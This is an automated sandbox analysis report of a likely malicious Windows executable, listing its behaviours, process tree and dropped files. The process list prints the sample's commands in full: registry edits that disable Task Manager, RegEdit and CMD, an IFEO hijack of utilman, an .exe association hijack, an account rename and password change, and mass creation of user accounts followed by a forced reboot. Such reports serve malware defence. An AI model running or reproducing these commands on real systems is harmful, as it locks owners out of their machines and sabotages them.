Analysis Overview
SHA256
b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f
Threat Level: Likely malicious
The file b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe was found to be: Likely malicious.
Malicious Activity Summary
Event Triggered Execution: Image File Execution Options Injection
Disables RegEdit via registry modification
Disables Task Manager via registry modification
Checks computer location settings
Drops file in System32 directory
Sets desktop wallpaper using registry
Enumerates physical storage devices
Unsigned PE
Event Triggered Execution: Accessibility Features
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Runs net.exe
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 02:33
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 02:33
Reported
2024-10-18 02:33
Platform
win7-20241010-en
Max time kernel
4s
Max time network
5s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "NUL" | C:\Windows\system32\reg.exe | N/A |
Drops file in System32 directory
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\img000.png" | C:\Windows\system32\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler | C:\Windows\System32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell | C:\Windows\System32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open | C:\Windows\System32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command | C:\Windows\System32\cmd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command\ = "wscript.exe \"C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\aplicaciones.vbs\" \"\" " | C:\Windows\System32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe | C:\Windows\System32\cmd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "VBSExeHandler" | C:\Windows\System32\cmd.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
"C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs"
C:\Windows\System32\cmd.exe
cmd /c ""C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd" "
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 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 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v UseDefaultTile /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "NUL" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png" /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayLastUserName /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayUserName /t REG_DWORD /d 3 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\System32\Wbem\WMIC.exe
wmic useraccount where name='Admin' rename "YOU ARE THE NEXT"
C:\Windows\system32\net.exe
net user "YOU ARE THE NEXT" "im dead"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user "YOU ARE THE NEXT" "im dead"
C:\Windows\system32\net.exe
net user T3yZrQ Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user T3yZrQ Maxcheto /add
C:\Windows\system32\net.exe
net user 8rJpX1 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 8rJpX1 Maxcheto /add
C:\Windows\system32\net.exe
net user 9MaL2Z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 9MaL2Z Maxcheto /add
C:\Windows\system32\net.exe
net user K4$dF27 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user K4$dF27 Maxcheto /add
C:\Windows\system32\net.exe
net user xC78RT Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user xC78RT Maxcheto /add
C:\Windows\system32\net.exe
net user 3nL9$p2x Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 3nL9$p2x Maxcheto /add
C:\Windows\system32\net.exe
net user X7hbQ5Z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user X7hbQ5Z Maxcheto /add
C:\Windows\system32\net.exe
net user R2xD1B Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user R2xD1B Maxcheto /add
C:\Windows\system32\net.exe
net user m14T8z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user m14T8z Maxcheto /add
C:\Windows\system32\net.exe
net user L27w8G Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user L27w8G Maxcheto /add
C:\Windows\system32\net.exe
net user P9dR2Y Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user P9dR2Y Maxcheto /add
C:\Windows\system32\net.exe
net user 5QL71t Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 5QL71t Maxcheto /add
C:\Windows\system32\net.exe
net user r8B6V3F Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user r8B6V3F Maxcheto /add
C:\Windows\system32\net.exe
net user 7CXz1b Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 7CXz1b Maxcheto /add
C:\Windows\system32\net.exe
net user n38vJQ Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user n38vJQ Maxcheto /add
C:\Windows\system32\net.exe
net user x6G7P1L Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user x6G7P1L Maxcheto /add
C:\Windows\system32\net.exe
net user M239Wk Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user M239Wk Maxcheto /add
C:\Windows\system32\net.exe
net user 7F2hY4Z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 7F2hY4Z Maxcheto /add
C:\Windows\system32\net.exe
net user 8QrB1L7 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 8QrB1L7 Maxcheto /add
C:\Windows\system32\net.exe
net user t93V6D Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user t93V6D Maxcheto /add
C:\Windows\system32\net.exe
net user 5tG2Q8J Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 5tG2Q8J Maxcheto /add
C:\Windows\system32\net.exe
net user x9K1P7L Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user x9K1P7L Maxcheto /add
C:\Windows\system32\net.exe
net user z7R4M3 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user z7R4M3 Maxcheto /add
C:\Windows\system32\shutdown.exe
shutdown /r /f /t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
Network
Files
C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs
| MD5 | 7c652236d1e09a76cfc27cb2611b80ad |
| SHA1 | f9c359054835b06308165e110cdc5229d4fda8fb |
| SHA256 | 4026d4567c422a1281580654d5592d5ce00fce125d8565b7c00ac5f7eb712e4c |
| SHA512 | 6a283c0428b91fbc39efbea2c3a793d89de1ae46451acf2c376c8b9b64c946ffa9ec9d83cc154d1647949e2cad79b2de2e3d655286d94ab52089734a92f943fe |
C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd
| MD5 | 7835d8ae389b8b78ea4d06c024d63849 |
| SHA1 | 5a0196e67a8af7185b372aacf5ad817a26546ad1 |
| SHA256 | 029a47eb246a5d4aa21b9a4ccaffc5103c5d93cd8955869d62d04e4f75612fd1 |
| SHA512 | 3b5c9ef7a6ec79983475b78e52b0e2c5d059cbcfd6b40832ddad067ed3fbf648507836664d489553372da6bfecc2c697b51b3ec57e5aa4d2939707bfc90c9372 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png
| MD5 | 44055016d847ddbd0e8f0a56ea2a0ba6 |
| SHA1 | cb4e3dfdb804aebb78c96100b42b29db28d902cd |
| SHA256 | 2fa62a6d8816d3a7f45a371449ef044851556f6d38fc5030be3f58a25ccbd7f2 |
| SHA512 | 3edee078f8221c4ff1da59215dcc8e2144db74c5679e386645c3c3a34038cc23f11f83ba86efeeb94f3b01ec90dc72d83da1a09c91cb0cb02d8019c5d226b9c4 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png
| MD5 | 4947724257526b4226e21ae7541822cd |
| SHA1 | af4db735de48a5069e70758bdfdf41a8214aa346 |
| SHA256 | 19fbde1e1c5489c3cabc0dcd408f43b789a2e2f89af03a1d4466e55ab1a1faba |
| SHA512 | 52986bdd6a21ae6c5c375a8142bb7cd758d537923e8427f0d6fce0763299306a720163246bd2808a1566c3422caefaa28d3d046f2a466baba3305c51d7ff8902 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png
| MD5 | 2f368b76ab153329fb42db70493474b1 |
| SHA1 | 4c4752399ee2678f6cf4d67affca9dcba59d0023 |
| SHA256 | ae8f3768cf4e3af37ad6efedff11f7f2aa6af91239c175a04c1c366b56b8c35f |
| SHA512 | adccaad355c71376490d5d21d788b3921db7c08291c8ef4066ced9c8cf99d188307da49f53fa987ecddd88f9c2b6c191969ad2d34b016aadefac5afd88dc4c6a |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png
| MD5 | 9ef9685c5a578bfdceccaedb0d5fa519 |
| SHA1 | 713f8621414772eee6602f9fa9ee0a3528d62057 |
| SHA256 | 6c118f5c5e4cf755ec5da06033a29faf53911c522f5aa3de2da2ae8944a87746 |
| SHA512 | 2238ee61a60358f5dfb003fbc69099cea7f62ad88f57c4629f022792d6257fef6928df5e613df152258475d1d49aaad6ae24119d1a67a86e0cdf96aafabbddfb |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png
| MD5 | f346c440007285aff13e1e0512608862 |
| SHA1 | 4b4a44bc30d37c66dea948bd406effc2bcc63775 |
| SHA256 | 2f2c6c5d8f57b0816cbf1d8db47d0735951f1d1cbf8d562046677391bac23901 |
| SHA512 | 34fd2d6734f3825496d3f8d36057832c39052a0cda05efdc44e2d94f45f8b710da790fda4882bfa1eeb3a9971c5207a6a5a567ec4949cd47fd8efbe95f35f032 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png
| MD5 | 1db691b8c60c5f82f3dae2df999c1c7c |
| SHA1 | c252d4a6e065ab5b122f0ae43f6abdbaad49d80e |
| SHA256 | f2669088bebce7d2624993500bc63677dc1a96a1d733c1df88feff17954b201d |
| SHA512 | 3629aaf9e5c40f86c8bdcbfd462a80af19cb883ab2e4b3e3b62f661bedd7c40f4254ae9f274cbd96f3cac2d156cc3a1e5bb3b649bb0df99ecbd93a8ca65330c7 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png
| MD5 | 908587d867cd053293e2106d70cf42f3 |
| SHA1 | 83ffc3fc7f61d972b41347ff783a29b41bf13087 |
| SHA256 | f622a9159e4b2e792ac772bfc2cfc0ea6c890bad7f7273c916418ce3d425e444 |
| SHA512 | 541b65da137ed37139146ce27aaaee58dac29892c43b39eb0a0a793ed2d868ca8e24bfe836b133e8941ac72ba8a3e1f6a80e04d30b6dea87846cf86129fda5e8 |
C:\ProgramData\Microsoft\User Account Pictures\user.bmp
| MD5 | 40e2162dfc51fded60ea7b1de3acf588 |
| SHA1 | 3c0b932a845027db10e67c47c0c9cd45fa80ecbb |
| SHA256 | d0d3a8fd4d52042486c2ff093ca64e99fa54b256a7c551f20a6c3f53f569fbf7 |
| SHA512 | 453aea922c4801dc7f7defae4be326158abef053a61518f3a7e1d32118130f8f1dc18945c783e20c5b52e4d698613c7ff715ec17e01b5166acc5f380a156047a |
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt
| MD5 | e3a317c88b65b975be8e1c21e149f16d |
| SHA1 | 6e7a24a1146ba2800bf0c56ef5b17ea32b01f019 |
| SHA256 | b21c998e4c7258fd24a27f0be4d0ddbdcf95a9f2d7b4f041727e241578a410c0 |
| SHA512 | 1d1228f0f297867b6b134ff8fe5cd493929103098a07beb0edbd63957423dc8536092482d7a061072398bf26e8a5e6a5b3e6fc67439d934671433f4b01208044 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 02:33
Reported
2024-10-18 02:33
Platform
win10v2004-20241007-en
Max time kernel
5s
Max time network
8s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "NUL" | C:\Windows\system32\reg.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops file in System32 directory
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\img000.png" | C:\Windows\system32\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "5" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command\ = "wscript.exe \"C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\aplicaciones.vbs\" \"\" " | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe | C:\Windows\system32\cmd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "VBSExeHandler" | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command | C:\Windows\system32\cmd.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
